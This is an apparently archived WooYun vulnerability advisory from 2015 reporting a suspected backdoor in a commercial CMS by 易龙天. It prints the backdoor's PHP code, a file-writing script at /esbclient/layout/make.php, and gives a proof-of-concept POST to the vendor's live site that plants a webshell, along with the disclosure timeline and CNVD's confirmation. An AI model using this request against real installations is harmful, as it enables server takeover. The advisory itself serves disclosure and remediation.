当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0102271

漏洞标题:某超大型商业CMS任意命令执行漏洞疑似后门二(涉及500强、工业、国企、电商、酒店集团、服务业等等领域)

相关厂商:易龙天

漏洞作者: 路人甲

提交时间:2015-03-19 11:09

修复时间:2015-06-22 08:32

公开时间:2015-06-22 08:32

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-19: 细节已通知厂商并且等待厂商处理中
2015-03-24: 厂商已经确认,细节仅向厂商公开
2015-03-27: 细节向第三方安全合作伙伴开放
2015-05-18: 细节向核心白帽子及相关领域专家公开
2015-05-28: 细节向普通白帽子公开
2015-06-07: 细节向实习白帽子公开
2015-06-22: 细节向公众公开

简要描述:

后门,绝对是后门!
狗哥,你要原谅我刷rank!

详细说明:

前人有经验:

 WooYun: 某超大型商业CMS高危通用SQL注射+Getshell(涉及500强、工业、国企、电商、酒店集团、服务业等等领域) 


后门文件:
/esbclient/layout/make.php
后门,绝对是后门!

<?php 
$_POST ['code'] = html_entity_decode ( stripslashes ( ($_POST ['code']) ) ); //处理被引号等\转义的的符号和html特殊转义
file_put_contents('content.php',$_POST['code']);
?>


同样直接file_put_contents了...
好了 ,官网测试
访问:http://www.elongtian.com/esbclient/layout/make.php
POST:code=<?php $wexiaoma;?>
提交后,我们可爱的小马就写入了content.php

漏洞证明:

1.png

修复方案:

删了吧

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-03-24 08:30

厂商回复:

CNVD确认并复现所述情况,已经由CNVD按以往联系渠道向软件生产厂商通报,由其后续协调网站管理单位处置.

最新状态:

暂无